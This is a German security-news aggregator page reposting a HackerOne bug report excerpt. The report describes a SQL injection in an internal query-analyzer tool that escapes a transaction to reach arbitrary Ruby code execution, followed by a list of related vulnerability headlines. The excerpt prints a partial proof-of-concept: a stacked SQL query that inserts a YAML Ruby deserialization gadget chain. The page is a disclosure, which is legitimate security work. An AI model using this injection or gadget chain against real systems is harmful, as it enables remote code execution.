Ausnahme gefangen: SSL certificate problem: certificate is not yet valid ๐Ÿ“Œ HackerOne: Ability to escape database transaction through SQL injection, leading to arbitrary code execution

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security



๐Ÿ“š HackerOne: Ability to escape database transaction through SQL injection, leading to arbitrary code execution


๐Ÿ’ก Newskategorie: Sicherheitslรผcken
๐Ÿ”— Quelle: vulners.com


image
HackerOne has an internal backend interface that gives debugging capabilities to its engineers. One of the features is the ability to run EXPLAIN ANALYZE queries against a connected database. This feature is accessible by a handful of engineers. The feature is vulnerable to a SQL injection that allows an attacker to escape the transaction that is wrapped around the EXPLAIN ANALYZE query. This SQL injection can be leveraged to execute arbitrary ruby on an application server. This vulnerability will be demonstrated against a local development environment. Proof of concept go to http://localhost:8080/support/sql_query_analyzer analyze the following query using the public database connection: ```sql SELECT 1 ; ROLLBACK ; INSERT INTO user_versions ( item_type ,item_id ,event ,email ,object ) VALUES ( 'User' ,2 ,'update' , 'uniquekeywordtotriggercode@hackerone.com' ,'--- username: - !ruby/object:Gem::Installer i: x - !ruby/object:Gem::SpecFetcher i: y - !ruby/object:Gem::Requirement requirements: !ruby/object:Gem::Package::TarReader io: &1 !ruby/object:Net::BufferedIO io: &1 !ruby/object:Gem::Package::TarReader::Entry read: 0 header: "abc" debug_output: &1 !ruby/object:Net::WriteAdapter socket: &1 !ruby/object:Gem::RequestSet sets:... ...



๐Ÿ“Œ HackerOne: Ability to escape database transaction through SQL injection, leading to arbitrary code execution


๐Ÿ“ˆ 108.67 Punkte

๐Ÿ“Œ HackerOne: Reflected XSS on www.hackerone.com and resources.hackerone.com


๐Ÿ“ˆ 37.86 Punkte

๐Ÿ“Œ HackerOne: HTML injection that may lead to XSS on HackerOne.com through H1 Triage Wizard Chrome Extension


๐Ÿ“ˆ 36.97 Punkte

๐Ÿ“Œ Google Chrome 29.0.1547.76 Transaction IDBTransaction.cpp Aborted/Completed Transaction memory corruption


๐Ÿ“ˆ 30.13 Punkte

๐Ÿ“Œ SQL filter bypass leading to arbitrary write requests using "SQL Manager"


๐Ÿ“ˆ 29.82 Punkte

๐Ÿ“Œ HackerOne: Reflected XSS on www.hackerone.com via Wistia embed code


๐Ÿ“ˆ 29.12 Punkte

๐Ÿ“Œ WordPress Fixes Critical PHP Object Injection Issue Leading to Code Execution


๐Ÿ“ˆ 25.75 Punkte

๐Ÿ“Œ [APPSEC-1861] PHP Object Injection in product entries leading to remote code execution


๐Ÿ“ˆ 25.75 Punkte

๐Ÿ“Œ Bugtraq: Nagios Core < 4.2.2 Curl Command Injection leading to Remote Code Execution [CVE-2016-9565]


๐Ÿ“ˆ 25.75 Punkte

๐Ÿ“Œ Bugtraq: Nagios Core < 4.2.2 Curl Command Injection leading to Remote Code Execution [CVE-2016-9565]


๐Ÿ“ˆ 25.75 Punkte

๐Ÿ“Œ [APPSEC-1830] PHP object Injection in product attributes leading to remote code execution


๐Ÿ“ˆ 25.75 Punkte

๐Ÿ“Œ Bugtraq: [RT-SA-2014-014] AVM FRITZ!Box: Arbitrary Code Execution Through Manipulated Firmware Images


๐Ÿ“ˆ 25.67 Punkte

๐Ÿ“Œ Bugtraq: [RT-SA-2014-014] AVM FRITZ!Box: Arbitrary Code Execution Through Manipulated Firmware Images


๐Ÿ“ˆ 25.67 Punkte

๐Ÿ“Œ Bugtraq: Kentico CMS version 9 through 11 - Arbitrary Code Execution


๐Ÿ“ˆ 25.67 Punkte

๐Ÿ“Œ Linux Kernel Through 4.20.10 Found Vulnerable to Arbitrary Code Execution


๐Ÿ“ˆ 25.67 Punkte

๐Ÿ“Œ Linux Kernel Through 4.20.10 Found Vulnerable to Arbitrary Code Execution (CVE-2019-8912)


๐Ÿ“ˆ 25.67 Punkte

๐Ÿ“Œ [PRODSECBUG-2296] Arbitrary code execution through design layout update - CVE-2019-7895


๐Ÿ“ˆ 25.67 Punkte

๐Ÿ“Œ [APPSEC-1931] PHP Object Injection in Zend framework leading to arbitrary file deletion


๐Ÿ“ˆ 25.44 Punkte

๐Ÿ“Œ HackerOne rewards bughunter who found critical security hole inโ€ฆ HackerOne


๐Ÿ“ˆ 25.24 Punkte

๐Ÿ“Œ HackerOne: Hacker email disclosed on submission at hackerone hactivity


๐Ÿ“ˆ 25.24 Punkte

๐Ÿ“Œ HackerOne: Open Redirection in [https://www.hackerone.com/index.php]


๐Ÿ“ˆ 25.24 Punkte

๐Ÿ“Œ HackerOne: Password not checked when disabling 2FA on HackerOne


๐Ÿ“ˆ 25.24 Punkte

๐Ÿ“Œ HackerOne: Any user with access to program can resume and suspend HackerOne Gateway


๐Ÿ“ˆ 25.24 Punkte

๐Ÿ“Œ HackerOne: Subdomain takeover of resources.hackerone.com


๐Ÿ“ˆ 25.24 Punkte

๐Ÿ“Œ HackerOne: Blind Stored XSS in HackerOne's Sal 4.1.4.2149 (sal.โ–ˆโ–ˆโ–ˆโ–ˆ.com)


๐Ÿ“ˆ 25.24 Punkte

๐Ÿ“Œ HackerOne: HackerOne Jira integration plugin Leaked JWT to unauthorized jira users


๐Ÿ“ˆ 25.24 Punkte

๐Ÿ“Œ HackerOne: HackerOne Undisclosed Report Leak via PoC of Full Disclosure on Hacktivity


๐Ÿ“ˆ 25.24 Punkte

๐Ÿ“Œ HackerOne: Hackers two email disclosed on submission at hackerone hactivity


๐Ÿ“ˆ 25.24 Punkte

๐Ÿ“Œ HackerOne: Bypass of #2035332 RXSS at image.hackerone.live via the `url` parameter


๐Ÿ“ˆ 25.24 Punkte

๐Ÿ“Œ HackerOne: Takeover of hackerone.engineering via Github


๐Ÿ“ˆ 25.24 Punkte











matomo